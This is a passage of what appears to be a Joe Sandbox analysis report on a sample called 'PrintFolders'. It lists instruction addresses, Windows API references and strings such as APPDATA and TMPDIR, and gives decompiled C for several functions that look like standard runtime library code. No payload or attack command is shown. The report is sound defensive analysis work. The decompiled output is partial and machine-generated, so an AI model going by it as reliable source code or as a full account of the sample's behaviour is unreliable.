0x10002731
0x10002735
0x10002736
0x1000273d
0x10002746
0x10002749
0x10002751
0x00000000
0x10002751
0x1000270d
0x100026fc
0x100026b9
0x100026b9
0x100026bc
0x100026c0
0x100026c8
0x10002755
0x10002755
0x1000275c
0x1000275f
0x1000278c
0x1000278c
0x10002790
0x10002793
0x100027c2
0x100027c2
0x100027c6
0x100027ce
0x100027d6
0x100027db
0x100027de
0x1000280d
0x1000280d
0x10002816
0x1000281b
0x10002823
0x10002825
0x1000282d
0x10002848
0x1000284a
0x1000284d
0x10002855
0x1000286d
0x10002874
0x10002874
0x1000284d
0x1000282d
0x1000287a
0x1000288b
0x1000289f
0x100028a6
0x100028b2
0x100028bb
0x100028c4
0x100028cd
0x100028d6
0x100028df
0x100028e8
0x100028f1
0x100028fa
0x10002902
0x10002908
0x1000290a
0x10002913
0x10002913
0x1000291e
0x1000292f
0x1000290c
0x1000290c
0x10002911
0x00000000
0x00000000
0x10002911
0x10002935
0x10002939
0x1000293c
0x1000296b
0x1000296b
0x10002977
0x10002977
0x1000297b
0x1000297e
0x100029b9
0x100029c0
0x100029cf
0x100029de
0x100029e6
0x100029f5
0x100029f6
0x100029f7
0x10002a01
0x10002980
0x10002980
0x10002984
0x10002985
0x10002987
0x1000298d
0x1000299f
0x1000299f
0x100029a1
0x100029a6
0x00000000
0x1000298f
0x1000298f
0x10002992
0x1000299a
0x1000299d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000299d
0x1000298d
0x1000293e
0x1000293e
0x10002942
0x10002943
0x10002945
0x1000294b
0x10002961
0x10002961
0x10002963
0x10002968
0x00000000
0x1000294d
0x1000294d
0x10002950
0x10002958
0x1000295b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000295b
0x1000294b
0x100027e0
0x100027e0
0x100027e4
0x100027e5
0x100027e7
0x100027ed
0x10002803
0x10002803
0x10002805
0x1000280a
0x00000000
0x100027ef
0x100027ef
0x100027f2
0x100027fa
0x100027fd
0x00000000
0x00000000
0x00000000
0x00000000
0x100027fd
0x100027ed
0x10002795
0x10002795
0x10002799
0x1000279a
0x1000279c
0x100027a2
0x100027b8
0x100027b8
0x100027ba
0x100027bf
0x00000000
0x100027a4
0x100027a4
0x100027a7
0x100027af
0x100027b2
0x00000000
0x00000000
0x00000000
0x00000000
0x100027b2
0x100027a2
0x10002761
0x10002761
0x10002764
0x10002766
0x1000276c
0x10002782
0x10002782
0x10002784
0x10002789
0x00000000
0x1000276e
0x1000276e
0x10002771
0x10002779
0x1000277c
0x10002a07
0x10002a07
0x10002a0c
0x10002a0c
0x10002a11
0x10002a11
0x10002a16
0x10002a17
0x10002a18
0x10002a19
0x10002a1a
0x10002a1b
0x10002a1c
0x10002a1d
0x10002a1e
0x10002a1f
0x10002a20
0x10002a21
0x10002a23
0x10002a26
0x10002a27
0x10002a29
0x10002a2a
0x10002a2d
0x10002a30
0x10002a33
0x10002a35
0x10002ba4
0x10002ba9
0x10002a3b
0x10002a3b
0x10002a3c
0x10002a3f
0x10002a42
0x10002a44
0x10002ba3
0x00000000
0x10002a4a
0x10002a4a
0x10002b5c
0x10002b5f
0x00000000
0x10002b61
0x10002b61
0x10002b64
0x00000000
0x10002b66
0x10002b66
0x10002b6c
0x10002b74
0x10002b77
0x10002b78
0x10002b7e
0x10002b92
0x10002b92
0x10002b94
0x10002b9c
0x00000000
0x10002b80
0x10002b80
0x10002b83
0x10002b86
0x10002b88
0x10002b8b
0x10002b8e
0x00000000
0x10002b90
0x10002b90
0x00000000
0x10002b90
0x10002b8e
0x10002b7e
0x10002b64
0x10002a50
0x10002a52
0x10002a57
0x10002a5e
0x10002a60
0x10002bb1
0x10002bb1
0x00000000
0x10002a66
0x10002a68
0x10002a6b
0x10002a6d
0x10002a78
0x10002a7a
0x10002a7c
0x10002a7e
0x10002a8a
0x10002a8c
0x10002a8e
0x10002a91
0x10002a94
0x10002a80
0x10002a80
0x10002a85
0x10002a85
0x10002a6f
0x10002a6f
0x10002a71
0x10002a71
0x10002aa0
0x10002aa2
0x10002aa8
0x10002ad1
0x10002ad3
0x10002ae2
0x10002ae2
0x10002ad5
0x10002ad5
0x10002ad6
0x10002adb
0x10002ade
0x10002ade
0x00000000
0x10002aaa
0x10002aaa
0x10002aaa
0x10002aad
0x10002aaf
0x10002bb6
0x10002bb6
0x10002bbb
0x10002bbc
0x10002bbd
0x10002bbe
0x10002bbf
0x10002bc0
0x10002bc1
0x10002bc3
0x10002bc4
0x10002bc5
0x10002bc6
0x10002bc9
0x10002bcb
0x10002bce
0x10002bd3
0x10002bd8
0x10002bdb
0x10002c64
0x10002c69
0x10002c6f
0x10002c72
0x10002c79
0x10002be1
0x10002be1
0x10002be4
0x10002be7
0x10002be8
0x10002bea
0x10002bed
0x10002bef
0x10002bef
0x10002bf1
0x10002bf7
0x10002c20
0x10002c20
0x10002bf9
0x10002bfc
0x10002c01
0x00000000
0x10002c03
0x10002c03
0x10002c09
0x10002c1b
0x10002c0b
0x10002c0b
0x10002c0b
0x10002c09
0x10002c01
0x10002c27
0x10002c30
0x10002c3e
0x10002c4e
0x10002c59
0x10002c61
0x10002c7b
0x10002c83
0x10002c8a
0x10002c91
0x10002c94
0x10002c97
0x10002c9c
0x10002ca1
0x10002ca8
0x10002caf
0x10002cb7
0x10002ab5
0x10002ab5
0x10002ab6
0x10002abb
0x10002abe
0x10002ac0
0x10002bac
0x10002bac
0x00000000
0x10002ac6
0x10002ac6
0x10002ac9
0x10002acc
0x10002ae4
0x10002ae7
0x10002aee
0x10002af1
0x10002af5
0x10002af6
0x10002b41
0x10002b42
0x10002b43
0x10002b48
0x10002b4e
0x10002b50
0x10002b59
0x10002af8
0x10002af8
0x10002afa
0x10002afb
0x10002afc
0x10002b04
0x10002b07
0x10002b08
0x10002b0e
0x10002b26
0x10002b26
0x10002b28
0x10002b2d
0x10002b33
0x10002b35
0x10002b3e
0x10002b10
0x10002b10
0x10002b13
0x10002b16
0x10002b18
0x10002b1b
0x10002b1e
0x00000000
0x10002b24
0x10002b24
0x00000000
0x10002b24
0x10002b1e
0x10002b0e
0x10002af6
0x10002ac0
0x10002aaf
0x10002aa8
0x10002a60
0x10002a4a
0x10002a44
0x00000000
0x00000000
0x00000000
0x1000277c
0x1000276c
0x1000275f
0x100026b7
0x1000257e
0x1000256a
0x1000255f
0x10002556
0x10002547
0x00000000
0x00000000
0x00000000
0x10002141
0x10002131

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,79EAB102,?,?), ref: 1000201A
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 100021C1
GetLastError.KERNEL32 ref: 100021CF
GetTempPathA.KERNEL32(00000104,?), ref: 100021EC
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 10002389
GetLastError.KERNEL32 ref: 10002393

Strings

APPDATA, xrefs: 10002043
TMPDIR, xrefs: 10002213

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderTemp
String ID: APPDATA$TMPDIR
API String ID: 519037321-4048745339
Opcode ID: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
Instruction ID: 73a1d6a44cef61f255837fd76ca3bed7767395f6b845790b902de768a736ecff
Opcode Fuzzy Hash: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
Instruction Fuzzy Hash: 41D1B271A042589FFB25CB24CC88B9DB7B5EF45340F1082D8E44AA7299D775AB84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0042ADB1 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042BA9F), ref: 0042ADCA

Strings

log10, xrefs: 0042AE0C, 0042AE1B
sqrt, xrefs: 0042AF09
log, xrefs: 0042AE27, 0042AE36
exp, xrefs: 0042AE49, 0042AEAE
pow, xrefs: 0042AE68, 0042AF12, 0042AF5F
asin, xrefs: 0042AEF7
acos, xrefs: 0042AF00

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
Instruction ID: 9a0aa79b74204bca965e26bff41110038d07c872e789de07625a36b1bd30ca62
Opcode Fuzzy Hash: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
Instruction Fuzzy Hash: CC5180B0A0052ACBCB148F99FA4C1AEBB74FB08304F964087EC51A7254C77C89768B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00425B4F Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00425B4F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E0041E25B(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0041ED2F(4);
						_t120 = 0;
						_v8 = _t125;
						E0041E2B8(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x43d160; // 0x43d1b4
								 *_t93 = _t53;
								_t54 =  *0x43d164; // 0x450784
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x43d168; // 0x450784
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x43d190; // 0x43d1b8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x43d194; // 0x450788
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0041ED2F(4);
							_v12 = _t121;
							E0041E2B8(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E004216C5(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E004216C5(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E004216C5(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E004216C5(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E004216C5(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00425AE6(_t93);
								E0041E2B8(_t93);
								E0041E2B8(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E0041E2B8(_v8);
								return _v16;
							}
							E0041E2B8();
							goto L12;
						}
						E0041E2B8(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x43d160;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E0041E2B8( *((intOrPtr*)(_t123 + 0x7c)));
							E0041E2B8( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x00425b4f
0x00425b59
0x00425b5f
0x00425b62
0x00425b6b
0x00425b8a
0x00425b92
0x00425b98
0x00425bab
0x00425bac
0x00425bb5
0x00425bb7
0x00425bba
0x00425bbd
0x00425bc6
0x00425bd7
0x00425bd9
0x00425be2
0x00425d31
0x00425d36
0x00425d38
0x00425d3d
0x00425d40
0x00425d45
0x00425d48
0x00425d4d
0x00425d50
0x00425d55
0x00425cc4
0x00425cca
0x00425cce
0x00425cd0
0x00425cd0
0x00000000
0x00425cce
0x00425bef
0x00425bf3
0x00425bf6
0x00425bfd
0x00425c00
0x00425c0d
0x00425c13
0x00425c1f
0x00425c24
0x00425c33
0x00425c3a
0x00425c47
0x00425c5b
0x00425c65
0x00425c7c
0x00425ca8
0x00425cb8
0x00425cb8
0x00425cbc
0x00000000
0x00000000
0x00425cad
0x00425cad
0x00425cb3
0x00425d1f
0x00425cb7
0x00425cb7
0x00000000
0x00425cb7
0x00425d21
0x00425d23
0x00425d23
0x00425d26
0x00425d28
0x00425d2b
0x00000000
0x00425d2f
0x00425cb5
0x00000000
0x00425cb5
0x00425cbe
0x00425cc1
0x00000000
0x00425cc1
0x00425c7f
0x00425c85
0x00425c8d
0x00425c95
0x00425c99
0x00425c9d
0x00000000
0x00425ca5
0x00425c02
0x00000000
0x00425c07
0x00425bc9
0x00000000
0x00425bd1
0x00000000
0x00425b75
0x00425b75
0x00425b77
0x00425b7a
0x00425cd2
0x00425cd2
0x00425cda
0x00425cdc
0x00425cdc
0x00425ce4
0x00425ce9
0x00425ced
0x00425cf2
0x00425cfd
0x00425d03
0x00425ced
0x00425d07
0x00425d0c
0x00425d12
0x00000000
0x00425d12

APIs

_free.LIBCMT ref: 00425BBD
_free.LIBCMT ref: 00425BC9
_free.LIBCMT ref: 00425CF2
_free.LIBCMT ref: 00425CFD

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
Instruction ID: c7266049f18fbd2a82f263cfe4493866a99ee9702eead5b57a4a5b9491e875f7
Opcode Fuzzy Hash: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
Instruction Fuzzy Hash: 34611671A007159FEB20DF66E841BABB7F8AF44314FA0456FE945EB381E774AC408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040C590(intOrPtr __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v68;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t41;
				intOrPtr* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t57;
				signed int _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t81;
				void* _t82;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t91;
				signed int _t94;
				void* _t102;

				_t79 = __edx;
				_t64 = _t91;
				_t94 = (_t91 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t64 + 4));
				_t89 = _t94;
				_push(0xffffffff);
				_push(0x42cc54);
				_push( *[fs:0x0]);
				_push(_t64);
				_t40 =  *0x43d054; // 0x7bd02ead
				_t41 = _t40 ^ _t94;
				_v32 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v24;
				_t84 =  *((intOrPtr*)(_t64 + 8));
				_v36 = _t84;
				E0040E0A3( &_v44, 0);
				_v16 = 0;
				_t81 =  *0x4500b0; // 0x1
				_t44 =  *0x450d08; // 0x16d1b90
				_v48 = _t44;
				if(_t81 == 0) {
					E0040E0A3( &_v40, _t81);
					_t102 =  *0x4500b0 - _t81; // 0x1
					if(_t102 == 0) {
						_t62 =  *0x450098; // 0x1
						_t63 = _t62 + 1;
						 *0x450098 = _t63;
						 *0x4500b0 = _t63;
					}
					E0040E0FB( &_v40);
					_t81 =  *0x4500b0; // 0x1
				}
				_t66 =  *((intOrPtr*)(_t84 + 4));
				if(_t81 >=  *((intOrPtr*)(_t66 + 0xc))) {
					_t85 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t66 + 0x14)) == 0) {
						L11:
						if(_t85 != 0) {
							L19:
							E0040E0FB( &_v44);
							 *[fs:0x0] = _v24;
							_pop(_t82);
							_pop(_t86);
							return E0040EBBF(_t85, _t64, _v32 ^ _t89, _t79, _t82, _t86);
						}
						L12:
						_t48 = _v48;
						if(_t48 == 0) {
							_t85 = E0040EDCF(_t81, _t85, __eflags, 0x18);
							_v48 = _t85;
							_v16 = 1;
							_t73 =  *((intOrPtr*)(_v36 + 4));
							__eflags = _t73;
							if(_t73 == 0) {
								_t50 = 0x4399f7;
							} else {
								_t50 =  *((intOrPtr*)(_t73 + 0x18));
								__eflags = _t50;
								if(_t50 == 0) {
									_t50 = _t73 + 0x1c;
								}
							}
							E00403F10(_t50);
							 *((intOrPtr*)(_t85 + 4)) = 0;
							 *_t85 = 0x42eee4;
							E0040E67F(_t81, _t85, __eflags,  &_v68);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							E00403FC0( &_v120);
							_v36 = _t85;
							_v16 = 2;
							E0040E254(__eflags, _t85);
							_t79 =  *_t85;
							 *((intOrPtr*)( *_t85 + 4))();
							 *0x450d08 = _t85;
						} else {
							_t85 = _t48;
						}
						goto L19;
					}
					_t57 = E0040E280();
					if(_t81 >=  *((intOrPtr*)(_t57 + 0xc))) {
						goto L12;
					}
					_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + _t81 * 4));
					goto L11;
				}
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 8)) + _t81 * 4));
				if(_t85 != 0) {
					goto L19;
				}
				goto L8;
			}

0x0040c590
0x0040c591
0x0040c599
0x0040c5a0
0x0040c5a4
0x0040c5a6
0x0040c5a8
0x0040c5b3
0x0040c5b4
0x0040c5b8
0x0040c5bd
0x0040c5bf
0x0040c5c4
0x0040c5c8
0x0040c5ce
0x0040c5d6
0x0040c5d9
0x0040c5de
0x0040c5e5
0x0040c5eb
0x0040c5f0
0x0040c5f5
0x0040c5fb
0x0040c600
0x0040c606
0x0040c608
0x0040c60d
0x0040c60e
0x0040c613
0x0040c613
0x0040c61b
0x0040c620
0x0040c620
0x0040c626
0x0040c62c
0x0040c63e
0x0040c63e
0x0040c640
0x0040c644
0x0040c656
0x0040c658
0x0040c6e5
0x0040c6e8
0x0040c6f2
0x0040c6fa
0x0040c6fb
0x0040c70c
0x0040c70c
0x0040c65e
0x0040c65e
0x0040c663
0x0040c670
0x0040c675
0x0040c678
0x0040c67f
0x0040c682
0x0040c684
0x0040c692
0x0040c686
0x0040c686
0x0040c689
0x0040c68b
0x0040c68d
0x0040c68d
0x0040c68b
0x0040c69b
0x0040c6a3
0x0040c6ab
0x0040c6b1
0x0040c6bc
0x0040c6bf
0x0040c6c3
0x0040c6c8
0x0040c6cc
0x0040c6d0
0x0040c6d5
0x0040c6dc
0x0040c6df
0x0040c665
0x0040c665
0x0040c665
0x00000000
0x0040c663
0x0040c646
0x0040c64e
0x00000000
0x00000000
0x0040c653
0x00000000
0x0040c653
0x0040c631
0x0040c636
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C5D9
std::_Lockit::_Lockit.LIBCPMT ref: 0040C5FB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C61B
__Getctype.LIBCPMT ref: 0040C6B1
std::_Facet_Register.LIBCPMT ref: 0040C6D0
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C6E8

Strings

B@, xrefs: 0040C6AB

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: B@
API String ID: 1102183713-1939862501
Opcode ID: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
Instruction ID: 6ac1ce246c7cb2948fc285676951677c035abaaa7204644bef92127c1cfd88d1
Opcode Fuzzy Hash: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
Instruction Fuzzy Hash: 8541AF71900214CBCB20DF55D881BAEB7B4EB14714F144A7EE846B7382DB3AAD05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1000A62A Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000A62A(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E1000F4C0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E10006406(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x10017ea0 - _t110; // 0x16de908
							if(__eflags != 0) {
								L14:
								_t64 =  *0x10017ea0; // 0x16de908
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E1000A932(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E1000A992(_t120, _t139, 4);
													E10008701(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E10008701( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E1000A992(_t139, _t138, 4);
												E10008701(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x10017ea0 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E10008BFC(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E10008701(_t149);
													goto L40;
												} else {
													_t76 = E10007728(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E10006359();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E10008BFC(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E100076E4(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E10008701(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E10008BFC(_t53, 1);
																		E10008701(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E10007728( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E10006359();
																				asm("int3");
																				_t84 =  *0x10017ea0; // 0x16de908
																				__eflags = _t84 -  *0x10017eac; // 0x16de908
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x10017ea0 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E1000D336(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E10006406(__eflags);
